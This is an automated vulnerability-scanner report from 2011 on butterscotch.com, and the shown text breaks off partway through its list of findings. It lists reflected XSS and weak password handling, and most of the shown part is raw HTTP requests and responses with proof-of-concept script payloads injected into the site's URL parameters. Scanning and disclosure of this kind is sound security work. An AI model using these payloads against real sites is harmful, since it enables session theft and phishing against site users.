butterscotch.com, XSS, Cross Site Scripting

XSS in butterscotch.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 09:28:29 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.butterscotch.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.butterscotch.com/ [src parameter]

1.3. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]

1.4. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]

1.5. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]

1.6. http://www.butterscotch.com/shows/AT [REST URL parameter 2]

1.7. http://www.butterscotch.com/shows/AT [REST URL parameter 2]

1.8. http://www.butterscotch.com/shows/AT [REST URL parameter 2]

1.9. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]

1.10. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]

1.11. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]

1.12. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]

1.13. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]

1.14. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]

1.15. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]

1.16. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]

1.17. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]

1.18. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]

1.19. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]

1.20. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]

1.21. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]

1.22. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]

1.23. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]

1.24. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]

1.25. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]

2. Cleartext submission of password

2.1. http://www.butterscotch.com/

2.2. http://www.butterscotch.com/

2.3. http://www.butterscotch.com/tutorials.html

2.4. http://www.butterscotch.com/tutorials.html

3. Password field submitted using GET method

3.1. http://www.butterscotch.com/

3.2. http://www.butterscotch.com/

3.3. http://www.butterscotch.com/tutorials.html

3.4. http://www.butterscotch.com/tutorials.html

4. Cookie without HttpOnly flag set

4.1. http://www.butterscotch.com/

4.2. http://www.butterscotch.com/

4.3. http://www.butterscotch.com/tutorials.html

5. Password field with autocomplete enabled

5.1. http://www.butterscotch.com/

5.2. http://www.butterscotch.com/

5.3. http://www.butterscotch.com/

5.4. http://www.butterscotch.com/tutorials.html

5.5. http://www.butterscotch.com/tutorials.html

6. Cross-domain Referer leakage

7. Cross-domain script include

7.1. http://www.butterscotch.com/

7.2. http://www.butterscotch.com/tutorials.html



1. Cross-site scripting (reflected)  next
There are 25 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.butterscotch.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f74ff'><script>alert(1)</script>d34a3b78cab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f74ff'><script>alert(1)</script>d34a3b78cab=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=b960dd1072a2f3a840f705ff54740c17; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: b960dd1072a2f3a840f705ff54740c17=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/?f74ff'><script>alert(1)</script>d34a3b78cab=1' />
...[SNIP]...

1.2. http://www.butterscotch.com/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 231c0'><script>alert(1)</script>53794fb9664 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?src=tcv3video231c0'><script>alert(1)</script>53794fb9664 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f0045cb2a5d7807aff4f74328f19c8e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f0045cb2a5d7807aff4f74328f19c8e=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63381

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/?src=tcv3video231c0'><script>alert(1)</script>53794fb9664' />
...[SNIP]...

1.3. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/A-List

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8c40"><script>alert(1)</script>23d9018f7a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/A-Lista8c40"><script>alert(1)</script>23d9018f7a3 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=5e0345a822ab339bca2c7c84855acc0c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 5e0345a822ab339bca2c7c84855acc0c=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50395

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/A-Lista8c40"><script>alert(1)</script>23d9018f7a3" />
...[SNIP]...

1.4. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/A-List

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f0c8"-alert(1)-"39e9638a1ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/A-List7f0c8"-alert(1)-"39e9638a1ff HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=8826b85f90e6e25f1b2bd4d9bfec5172; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 8826b85f90e6e25f1b2bd4d9bfec5172=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50348

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/A-List7f0c8"-alert(1)-"39e9638a1ff";

</script>
...[SNIP]...

1.5. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/A-List

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f0b4'><script>alert(1)</script>f96c8436d8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/A-List2f0b4'><script>alert(1)</script>f96c8436d8c HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=1bdc60d8c9f8abf938a1f22889b51782; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1bdc60d8c9f8abf938a1f22889b51782=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50406

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/A-List2f0b4'><script>alert(1)</script>f96c8436d8c' />
...[SNIP]...

1.6. http://www.butterscotch.com/shows/AT [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/AT

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259d1"><script>alert(1)</script>966a5ade193 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/AT259d1"><script>alert(1)</script>966a5ade193 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=b38aa8055bf37effd925e13cec8e7d9d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: b38aa8055bf37effd925e13cec8e7d9d=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50494

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/AT259d1"><script>alert(1)</script>966a5ade193" />
...[SNIP]...

1.7. http://www.butterscotch.com/shows/AT [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/AT

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30613"-alert(1)-"94f0bdba78e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/AT30613"-alert(1)-"94f0bdba78e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=1771e39f97e82be5a5c155fe5c62274c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1771e39f97e82be5a5c155fe5c62274c=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/AT30613"-alert(1)-"94f0bdba78e";

</script>
...[SNIP]...

1.8. http://www.butterscotch.com/shows/AT [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/AT

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9be04'><script>alert(1)</script>43f8c6292e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/AT9be04'><script>alert(1)</script>43f8c6292e2 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=ee4acbcf205d38f8c695616e3a019909; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ee4acbcf205d38f8c695616e3a019909=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50376

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/AT9be04'><script>alert(1)</script>43f8c6292e2' />
...[SNIP]...

1.9. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Lab-Rats

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f862"-alert(1)-"b0c5dfc94b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/Lab-Rats2f862"-alert(1)-"b0c5dfc94b0 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=e7f613b15848092e6b01b527ee3f9a12; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e7f613b15848092e6b01b527ee3f9a12=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50381

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/Lab-Rats2f862"-alert(1)-"b0c5dfc94b0";

</script>
...[SNIP]...

1.10. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Lab-Rats

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605d2"><script>alert(1)</script>0f550289d8e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Lab-Rats605d2"><script>alert(1)</script>0f550289d8e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4cbfaeec7ed123668b3a45cda4a1424b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4cbfaeec7ed123668b3a45cda4a1424b=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50560

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/Lab-Rats605d2"><script>alert(1)</script>0f550289d8e" />
...[SNIP]...

1.11. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Lab-Rats

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1cdff'><script>alert(1)</script>7fc59e7282f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Lab-Rats1cdff'><script>alert(1)</script>7fc59e7282f HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=f83e5edc74f32490e6d7c846e45b30e4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f83e5edc74f32490e6d7c846e45b30e4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/Lab-Rats1cdff'><script>alert(1)</script>7fc59e7282f' />
...[SNIP]...

1.12. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Miss-Download

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86263'><script>alert(1)</script>484a3c8edc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Miss-Download86263'><script>alert(1)</script>484a3c8edc8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

